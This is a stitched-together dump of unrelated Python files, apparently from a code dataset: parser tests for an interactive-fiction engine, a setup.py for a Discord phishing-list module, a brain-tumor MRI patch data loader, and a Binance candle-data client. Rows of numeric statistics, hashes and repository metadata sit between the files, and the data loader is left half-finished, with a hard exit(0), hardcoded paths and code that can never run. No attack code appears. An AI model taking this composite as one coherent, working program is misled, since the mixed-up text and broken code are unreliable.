            f"This test needs the value of noun ({noun}) to be such that it does not "
            "initially exist in self.game.nouns",
        )

        item1 = Thing(self.game, noun)
        self.start_room.addThing(item1)
        self.assertTrue(
            noun in self.game.nouns,
            "Name was not added to self.game.nouns after Thing creation",
        )

        self.game.turnMain(f"examine {noun}")
        self.assertIs(
            self.game.parser.command.dobj.target,
            item1,
            "Failed to match item from unambiguous noun",
        )

        item2 = Thing(self.game, noun)
        self.start_room.addThing(item2)
        self.assertEqual(len(self.game.nouns[noun]), 2)

        adj1 = "unique"
        adj2 = "special"
        self.assertNotEqual(
            adj1, adj2, "This test requires that adj1 and adj2 are not equal"
        )
        item1.setAdjectives([adj1])
        item2.setAdjectives([adj2])

        self.game.turnMain(f"examine {noun}")
        self.assertEqual(self.game.parser.command.dobj.tokens, [noun])

        self.game.turnMain(f"examine {adj1} {noun}")
        self.assertIs(
            self.game.parser.command.dobj.target,
            item1,
            "Noun adjective array should have been unambiguous, but failed to match "
            "Thing",
        )


class TestParserError(IFPTestCase):
    def test_verb_not_understood(self):
        self.game.turnMain("thisverbwillnevereverbedefined")
        msg = self.app.print_stack.pop()
        expected = "I don't understand the verb:"
        self.assertIn(expected, msg, "Unexpected response to unrecognized verb.")

    def test_suggestion_not_understood(self):
        topic = SpecialTopic(
            self.game, "tell sarah to grow a beard", "You tell Sarah to grow a beard."
        )
        self.game.parser.command.specialTopics["tell sarah to grow a beard"] = topic
        self.game.turnMain("thisverbwillnevereverbedefined")
        msg = self.app.print_stack.pop()
        expected = "is not enough information to match a suggestion"
        self.assertIn(expected, msg, "Unexpected response to unrecognized suggestion.")

    def test_noun_not_understood(self):
        self.game.turnMain("take thisnounwillnevereverbedefined")
        msg = self.app.print_stack.pop()
        expected = "I don't see any"
        self.assertIn(expected, msg, "Unexpected response to unrecognized noun.")

    def test_verb_by_objects_unrecognized_noun(self):
        self.game.turnMain("lead sarah")
        msg = self.app.print_stack.pop()
        expected = "I understood as far as"
        self.assertIn(
            expected,
            msg,
            "Unexpected response attempting to disambiguate verb with unrecognized "
            "noun.",
        )

    def test_verb_by_objects_no_near_matches_unrecognized_noun(self):
        sarah1 = Actor(self.game, "teacher")
        sarah1.setAdjectives(["good"])
        self.start_room.addThing(sarah1)
        sarah2 = Actor(self.game, "teacher")
        sarah2.setAdjectives(["bad"])
        self.start_room.addThing(sarah2)
        self.game.turnMain("hi teacher")
        self.assertTrue(self.game.parser.command.ambiguous)
        self.game.turnMain("set green sarah")
        msg = self.app.print_stack.pop()
        expected = "I understood as far as"
        self.assertIn(
            expected,
            msg,
            "Unexpected response attempting to disambiguate verb with unrecognized "
            "noun.",
        )


class TestCompositeObjectRedirection(IFPTestCase):
    def test_composite_object_redirection(self):
        bench = Surface(self.game, "bench")
        self.start_room.addThing(bench)
        underbench = UnderSpace(self.game, "space")
        bench.addComposite(underbench)
        widget = Thing(self.game, "widget")
        underbench.addThing(widget)
        self.game.turnMain("look under bench")
        msg = self.app.print_stack.pop()
        self.assertIn(
            widget.verbose_name,
            msg,
            "Unexpected response attempting to use a component redirection",
        )


class TestDisambig(IFPTestCase):
    def test_disambiguate_with_directional_adjective(self):
        east_pillar = Thing(self.game, "pillar")
        east_pillar.setAdjectives(["east"])
        west_pillar = Thing(self.game, "pillar")
        west_pillar.setAdjectives(["west"])
        self.start_room.addThing(east_pillar)
        self.start_room.addThing(west_pillar)
        self.game.turnMain("x pillar")
        self.assertTrue(self.game.parser.command.ambiguous)
        self.game.turnMain("east")
        self.assertIs(
            self.game.parser.command.dobj.target,
            east_pillar,
            "Unexpected direct object after attempting to disambiguate with direction "
            "adjective",
        )

    def test_disambiguate_with_index(self):
        east_pillar = Thing(self.game, "pillar")
        east_pillar.setAdjectives(["east"])
        west_pillar = Thing(self.game, "pillar")
        west_pillar.setAdjectives(["west"])
        self.start_room.addThing(east_pillar)
        self.start_room.addThing(west_pillar)
        self.game.turnMain("x pillar")
        self.assertTrue(self.game.parser.command.ambiguous)
        self.game.turnMain("1")
        self.assertIn(
            self.game.parser.command.dobj.target,
            [east_pillar, west_pillar],
            "Unexpected direct object after attempting to disambiguate with index",
        )


class TestPrepositions(IFPTestCase):
    def test_prepositional_adjectives(self):
        up_ladder = Thing(self.game, self._get_unique_noun())
        up_ladder.setAdjectives(["high", "up"])
        self.start_room.addThing(up_ladder)
        self.game.turnMain(f"x up high {up_ladder.name}")
        self.assertIs(
            self.game.parser.command.verb,
            ExamineVerb,
            "Unexpected verb after using a preposition as an adjective",
        )
        self.assertIs(
            self.game.parser.command.dobj.target,
            up_ladder,
            "Unexpected dobj after using a preposition as an adjective",
        )

    def test_verb_rejected_if_preposition_not_accounted_for(self):
        up_ladder = Thing(self.game, self._get_unique_noun())
        self.start_room.addThing(up_ladder)
        self.game.turnMain(f"x up big {up_ladder.name}")
        self.assertIsNot(
            self.game.parser.command.verb,
            ExamineVerb,
            "Examine verb does not have preposition `up`. Should not have matched.",
        )

    def test_preposition_directional_verb(self):
        girl = Thing(self.game, "girl")
        self.start_room.addThing(girl)
        self.game.turnMain(f"lead girl up")
        self.assertIs(
            self.game.parser.command.verb,
            LeadDirVerb,
            "Unexpected verb after using a direction that doubles as a preposition (up) "
            "for a directional verb",
        )


class TestKeywords(IFPTestCase):
    def test_keyword_adjectives(self):
        everything_box = Thing(self.game, self._get_unique_noun())
        everything_box.setAdjectives(["good", "everything"])
        self.start_room.addThing(everything_box)
        self.game.turnMain(f"x everything good {everything_box.name}")
        self.assertIs(
            self.game.parser.command.verb,
            ExamineVerb,
            "Unexpected verb after using an english keyword as an adjective",
        )
        self.assertIs(
            self.game.parser.command.dobj.target,
            everything_box,
            "Unexpected dobj after using an english keyword as an adjective",
        )

    def test_verb_rejected_if_keyword_not_accounted_for(self):
        everything_box = Thing(self.game, self._get_unique_noun())
        self.start_room.addThing(everything_box)
        self.game.turnMain(f"x everything good {everything_box.name}")
        self.assertIsNot(
            self.game.parser.command.verb,
            ExamineVerb,
            "Examine verb does not have keyword `everything`. Should not have matched.",
        )

    def test_verb_with_keyword(self):
        self.game.turnMain("take all")
        self.assertIs(
            self.game.parser.command.verb,
            GetAllVerb,
            "Tried to call a verb with an english keyword.",
        )


class TestSuggestions(IFPTestCase):
    def test_accept_suggestion(self):
        girl = Actor(self.game, "girl")
        TOPIC_SUGGESTION = "ask what her name is"
        TOPIC_TEXT = '"It\'s Karen," says the girl.'
        topic = SpecialTopic(self.game, TOPIC_SUGGESTION, TOPIC_TEXT)
        girl.addSpecialTopic(topic)
        self.start_room.addThing(girl)
        self.game.turnMain("talk to girl")
        self.assertTrue(self.game.parser.command.specialTopics)
        self.game.turnMain(TOPIC_SUGGESTION)
        msg = self.app.print_stack.pop(-2)
        self.assertEqual(
            msg, TOPIC_TEXT, "Expected topic text to print after accepting suggestion"
        )


class TestReplacement(IFPTestCase):
    STRING = "this one here is improbable to find elsewhere"
    INTEGER = 77

    @classmethod
    def class_method_with_one_arg(cls, ret):
        return ret

    def test_print_replace_with_string(self):
        thing = Thing(self.game, self._get_unique_noun())
        thing.x_description = "I will <<test_parser.TestReplacement.STRING>> this."
        thing.moveTo(self.start_room)
        self.game.turnMain(f"x {thing.name}")
        msg = self.app.print_stack.pop()
        self.assertIn(self.STRING, msg)

    def test_print_replace_with_integer(self):
        thing = Thing(self.game, self._get_unique_noun())
        thing.x_description = "I will <<test_parser.TestReplacement.INTEGER>> this."
        thing.moveTo(self.start_room)
        self.game.turnMain(f"x {thing.name}")
        msg = self.app.print_stack.pop()
        self.assertIn(str(self.INTEGER), msg)

    def test_attempting_to_replace_with_function_call_raises(self):
        thing = Thing(self.game, self._get_unique_noun())
        thing.x_description = (
            "I will <<test_parser.TestReplacement.class_method_with_one_arg(7)>> this."
        )
        thing.moveTo(self.start_room)
        with self.assertRaises(NotImplementedError):
            self.game.turnMain(f"x {thing.name}")
| 32.414097
| 89
| 0.647323
| 1,733
| 14,716
| 5.345066
| 0.151183
| 0.08982
| 0.055921
| 0.083882
| 0.608118
| 0.576055
| 0.5346
| 0.488934
| 0.403865
| 0.370614
| 0
| 0.002631
| 0.251019
| 14,716
| 453
| 90
| 32.485651
| 0.837779
| 0
| 0
| 0.354167
| 0
| 0
| 0.189861
| 0.018279
| 0
| 0
| 0
| 0
| 0.14881
| 1
| 0.083333
| false
| 0
| 0.020833
| 0.002976
| 0.151786
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb6e51b991925d3f2d075e10b6faa76829b92e27
| 965
|
py
|
Python
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | 1
|
2021-11-04T18:38:43.000Z
|
2021-11-04T18:38:43.000Z
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
import setuptools
import re

with open("README.md", "r") as fh:
    long_description = fh.read()

version = ''
with open('pydisfish/__init__.py') as f:
    version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)

if not version:
    raise RuntimeError('version is not set')

requirements = []
with open('requirements.txt') as f:
    requirements = f.read().splitlines()

setuptools.setup(
    name='pydisfish',
    version=version,
    author='kajdev',
    description="A small module to easily interact with discord's phishing domain list.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/kajdev/pydisfish",
    packages=["pydisfish"],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    install_requires=requirements
)
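# Quick, self-contained check of the version-extraction regex used above;
# the sample string is hypothetical.
import re

sample = '__version__ = "1.2.3"'
match = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', sample, re.MULTILINE)
print(match.group(1))  # -> 1.2.3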
| 28.382353
| 99
| 0.65285
| 112
| 965
| 5.491071
| 0.625
| 0.097561
| 0.061789
| 0.097561
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002564
| 0.19171
| 965
| 33
| 100
| 29.242424
| 0.785897
| 0
| 0
| 0
| 0
| 0
| 0.35544
| 0.043523
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb70059c996805e1f7f560d971daa768591ddbce
| 9,173
|
py
|
Python
|
backup/data_bk.py
|
ieee820/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 157
|
2018-09-22T20:45:04.000Z
|
2022-01-24T13:08:09.000Z
|
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | null | null | null |
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 53
|
2018-10-09T09:34:15.000Z
|
2021-08-14T10:24:43.000Z
|
import sys
if sys.version_info[0] == 2:
    import Queue as queue
else:
    import queue

import os
import math
import time
import multiprocessing as mp
import threading

import torch
from torch.utils.data import Dataset
import numpy as np

from data_utils import get_receptive_field, get_sub_patch_shape, \
    get_offset, sample_coords, get_all_coords, nib_load

PATCH_SHAPE = (25, 25, 25)
KERNELS = ((3, 3, 3), )*8
SCALE_FACTOR = (3, 3, 3)
SHAPE = [240, 240, 155]

np.random.seed(2017)

mean = [433.78412444, 661.42844749, 588.09469198, 651.22305233]
mean = np.array(mean).reshape(4, 1, 1, 1)
std = [1343.81579289, 1200.61193295, 1178.99769383, 1390.22978543]
std = np.array(std).reshape(4, 1, 1, 1)


class ImageList(Dataset):
    def __init__(self,
                 list_file,
                 patch_shape=PATCH_SHAPE,
                 kernels=KERNELS,
                 scale_factor=SCALE_FACTOR,
                 root='',
                 split='valid',
                 sample_size=20):
        names = []
        with open(list_file) as f:
            for line in f:
                line = line.strip()
                name = line.split('/')[-1]
                path = os.path.join(root, line, name + '_')
                names.append(path)
        self.root = root
        self.names = names
        self.split = split
        self.sample_size = sample_size
        self.receptive_field = get_receptive_field(kernels)
        self.patch_shape = np.array(patch_shape)
        self.scale_factor = np.array(scale_factor)
        self.sub_patch_shape = get_sub_patch_shape(
            self.patch_shape, self.receptive_field, self.scale_factor)
        self.sub_off = get_offset(self.scale_factor, self.receptive_field)
        self.modalities = ('flair', 't1ce', 't1', 't2')
        self.C = len(self.modalities)

    def coord_to_slice(self, coord):
        return coord[:, 0], coord[:, 1] + 1

    def coord_to_sub_slice(self, coord):
        lo = coord[:, 0] + self.sub_off
        num = self.patch_shape - self.receptive_field + 1
        hi = lo + self.scale_factor*self.receptive_field + \
            np.ceil((num*1.0)/self.scale_factor - 1) * self.scale_factor
        hi = hi.astype('int')
        lo = lo.astype('int')
        m = lo < 0
        pl = -lo * m
        lo[lo < 0] = 0
        m = hi > SHAPE
        ph = (hi - SHAPE) * m
        hi += pl.astype('int')
        pad = list(zip(pl, ph))
        return lo, hi, pad

    def crop(self, coords, images, label):
        N = coords.shape[0]
        samples = np.zeros((N, self.C) + tuple(self.patch_shape), dtype='float32')
        sub_samples = np.zeros((N, self.C) + tuple(self.sub_patch_shape), dtype='float32')
        labels = np.zeros((N,) + (9, 9, 9), dtype='int')
        size = (self.sub_patch_shape - 1)//2
        gl = (self.patch_shape - size)//2
        gh = self.patch_shape - gl
        kx, ky, kz = self.scale_factor
        for n, coord in enumerate(coords):
            ss, ee = self.coord_to_slice(coord)
            lo, hi, pad = self.coord_to_sub_slice(coord)
            cropped_label = label[ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
            labels[n] = cropped_label[gl[0]:gh[0], gl[1]:gh[1], gl[2]:gh[2]]
            samples[n] = images[:, ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
            pimages = np.pad(images, [(0, 0)] + pad, mode='constant') \
                if np.sum(pad) > 0 else images
            sub_samples[n] = \
                pimages[:, lo[0]:hi[0]:kx, lo[1]:hi[1]:ky, lo[2]:hi[2]:kz]
        samples = samples - mean
        samples = samples / std
        sub_samples = sub_samples - mean
        sub_samples = sub_samples / std
        return samples, sub_samples, labels

    def __call__(self, index):
        return self.__getitem__(index)

    def __getitem__(self, index):
        path = self.names[index]
        start = time.time()
        images = np.array([
            nib_load(path + modal + '.nii.gz')
            for modal in self.modalities])
        t1 = time.time() - start
        start = time.time()
        mask = images.sum(0) > 0
        #images -= mean * mask
        #images /= std
        label_file = path + 'seg.nii.gz'
        label = nib_load(label_file)
        # exit(0)  # leftover debug exit; kept commented so the loader can run
        n = self.sample_size
        if self.split == 'train':
            fg = (label > 0).astype('int32')
            bg = ((mask > 0) * (fg == 0)).astype('int32')
            coords = np.concatenate(
                [sample_coords(n//2, self.patch_shape, weight) for weight in (fg, bg)])
        elif self.split == 'valid':
            coords = sample_coords(n, self.patch_shape, mask)
        else:  # test
            coords = get_all_coords((9, 9, 9), self.patch_shape, SHAPE, 15)
        t2 = time.time() - start
        start = time.time()
        samples, sub_samples, labels = self.crop(coords, images, label)
        t3 = time.time() - start
        msg = 'read {}, sample {}, crop {}, total {}'.format(t1, t2, t3, t1 + t2 + t3)
        print(msg)
        #print(t1, t2, t3, t1+t2+t3)
        # 2.3 sec total
        #exit(0)
        return samples, sub_samples, labels, coords

    def __len__(self):
        return len(self.names)

    @staticmethod
    def collate(batch):
        data = [torch.cat([torch.from_numpy(t) for t in v]) for v in zip(*batch)]
        perm = torch.randperm(data[0].shape[0])
        return [t[perm] for t in data]


class PEDataLoader(object):
    """
    A multiprocess dataloader that parallelizes over elements as opposed to
    over batches (the torch built-in one).
    Input dataset must be callable with index argument: dataset(index)
    https://github.com/thuyen/nnet/blob/master/pedataloader.py
    """
    def __init__(self, dataset, batch_size=1, shuffle=False,
                 num_workers=None, pin_memory=False, num_batches=None):
        self.dataset = dataset
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.num_workers = num_workers
        # `collate` was an undefined name in the original; the dataset's own
        # staticmethod appears to be the intended collate function.
        self.collate_fn = ImageList.collate
        self.pin_memory_fn = \
            torch.utils.data.dataloader.pin_memory_batch if pin_memory else \
            lambda x: x
        self.num_samples = len(dataset)
        self.num_batches = num_batches or \
            int(math.ceil(self.num_samples / float(self.batch_size)))
        self.pool = mp.Pool(num_workers)
        self.buffer = queue.Queue(maxsize=1)
        self.start()

    def generate_batches(self):
        if self.shuffle:
            indices = torch.LongTensor(self.batch_size)
            for b in range(self.num_batches):
                indices.random_(0, self.num_samples-1)
                batch = self.pool.map(self.dataset, indices)
                batch = self.collate_fn(batch)
                batch = self.pin_memory_fn(batch)
                yield batch
        else:
            self.indices = torch.LongTensor(range(self.num_samples))
            for b in range(self.num_batches):
                start_index = b*self.batch_size
                end_index = (b+1)*self.batch_size if b < self.num_batches - 1 \
                    else self.num_samples
                indices = self.indices[start_index:end_index]
                batch = self.pool.map(self.dataset, indices)
                batch = self.collate_fn(batch)
                batch = self.pin_memory_fn(batch)
                yield batch

    def start(self):
        def _thread():
            for b in self.generate_batches():
                self.buffer.put(b, block=True)
            self.buffer.put(None)
        thread = threading.Thread(target=_thread)
        thread.daemon = True
        thread.start()

    def __next__(self):
        batch = self.buffer.get()
        if batch is None:
            self.start()
            raise StopIteration
        return batch

    next = __next__

    def __iter__(self):
        return self

    def __len__(self):
        return self.num_batches


root = '/home/thuyen/Data/brats17/Brats17TrainingData/'
file_list = root + 'file_list.txt'
dset = ImageList(file_list, root=root)

start = time.time()
for i in range(len(dset)):
    dset[i]
#x1, x2, y, c = dset[0]
print(time.time() - start)
start = time.time()

exit(0)

from dataloader import DataLoader
from sampler import SSampler

batch_size = 10
num_epochs = 20
num_iters = len(dset) * num_epochs // batch_size
sampler = SSampler(len(dset), num_epochs=num_epochs)
dloader = DataLoader(dset,
        batch_size=batch_size, pin_memory=True, collate_fn=ImageList.collate, sampler=sampler,
        #batch_size=batch_size, pin_memory=True, shuffle=True,
        #num_batches = num_iters,
        num_workers=20)

#a = torch.rand(10).cuda()
start = time.time()
count = 0
for k, x in enumerate(dloader):
    if k == 0:
        count = 0
        start = time.time()
    shapes = [t.shape for t in x]
    print(k, str(shapes))
    y = [t.cuda(non_blocking=True) for t in x]
    count += 1
end = time.time()
print((end-start)/(count - 1), count)

#start = time.time()
#for x in dloader:
#    end = time.time()
#    print(x[0].size(), end-start)
#    start = end
#
#exit(0)

# preprocess data to speed up training and predictions
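# Self-contained sketch of the channel-wise normalization applied in crop()
# above: subtract a per-modality mean and divide by a per-modality std,
# broadcast over the spatial axes. The random input stands in for real scans.
import numpy as np

x = np.random.rand(4, 25, 25, 25) * 1000           # 4 modalities, one patch
m = x.reshape(4, -1).mean(axis=1).reshape(4, 1, 1, 1)
s = x.reshape(4, -1).std(axis=1).reshape(4, 1, 1, 1)
z = (x - m) / s
print(z.reshape(4, -1).mean(axis=1))               # ~0 for every modality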
| 29.782468
| 94
| 0.578764
| 1,245
| 9,173
| 4.105221
| 0.209639
| 0.035218
| 0.024653
| 0.009978
| 0.137351
| 0.121698
| 0.076306
| 0.054392
| 0.043044
| 0.043044
| 0
| 0.038438
| 0.296631
| 9,173
| 307
| 95
| 29.879479
| 0.75372
| 0.066172
| 0
| 0.146119
| 0
| 0
| 0.021946
| 0.005398
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068493
| false
| 0
| 0.073059
| 0.022831
| 0.200913
| 0.018265
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb715b8832fba253f15741c5824e20ae8941000e
| 2,364
|
py
|
Python
|
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
from .utils import to_ms, to_candle
from ..api_candles import ApiCandles
from ...timeframes import Timeframes
import datetime, time
import requests as r


class BinanceApiCandles(ApiCandles):
    _url = 'https://api.binance.com/api/v3/klines'
    # <Timeframes> : <str - binance str repr>
    _binance_intervals = {
        Timeframes.M1: '1m',
        Timeframes.M3: '3m',
        Timeframes.M5: '5m',
        Timeframes.M15: '15m',
        Timeframes.M30: '30m',
        Timeframes.H1: '1h',
        Timeframes.H2: '2h',
        Timeframes.H4: '4h',
        Timeframes.D1: '1d',
        Timeframes.W1: '1w'
    }

    def __init__(self, ticker: str, timeframe_tag: Timeframes):
        try:
            self._interval = self._binance_intervals[timeframe_tag]
        except KeyError:
            allowed = list(self._binance_intervals.keys())
            raise ValueError(
                f'Binance API supports the following timeframes: {allowed}')
        self._ticker = ticker
        self._gen = None
        super().__init__(timeframe_tag)

    def _candles(self):
        # Convert datetime objects to timestamp
        since = to_ms(self._start_date.timestamp())
        end_time = to_ms(time.time())
        MAX_PER_REQUEST = 1000
        max_time_step = MAX_PER_REQUEST*self.candle_duration()*1000
        params = {
            'symbol': self._ticker,
            'interval': self._interval,
            'startTime': None,
            'endTime': end_time,
            'limit': MAX_PER_REQUEST
        }
        for start_time in range(since, end_time, max_time_step):
            # this requests 1k candles at a time
            params['startTime'] = start_time
            res = r.get(self._url, params)
            res.raise_for_status()
            for obj in res.json():
                yield to_candle(obj, self._candle_buffer)

    def current_date(self) -> datetime.datetime:
        if not self._start_date:
            return None
        ticks = self.get_ticks()
        time_passed = datetime.timedelta(
            seconds=ticks*self.candle_duration())
        return self._start_date + time_passed

    def next(self) -> None:
        if not self._gen:
            self._gen = iter(self._candles())
        next(self._gen)
        self._tick_counter.increment()
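# Hedged, class-independent sketch of the kline request made in _candles()
# above; hitting the public endpoint needs network access, and the symbol
# choice is an assumption.
import requests

resp = requests.get('https://api.binance.com/api/v3/klines',
                    {'symbol': 'BTCUSDT', 'interval': '1m', 'limit': 3})
resp.raise_for_status()
for kline in resp.json():
    print(kline[0], kline[1], kline[4])  # open time (ms), open, close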
| 31.945946
| 76
| 0.576565
| 261
| 2,364
| 4.961686
| 0.429119
| 0.021622
| 0.030116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021237
| 0.322758
| 2,364
| 73
| 77
| 32.383562
| 0.787633
| 0.047377
| 0
| 0
| 0
| 0
| 0.073103
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067797
| false
| 0.033898
| 0.084746
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|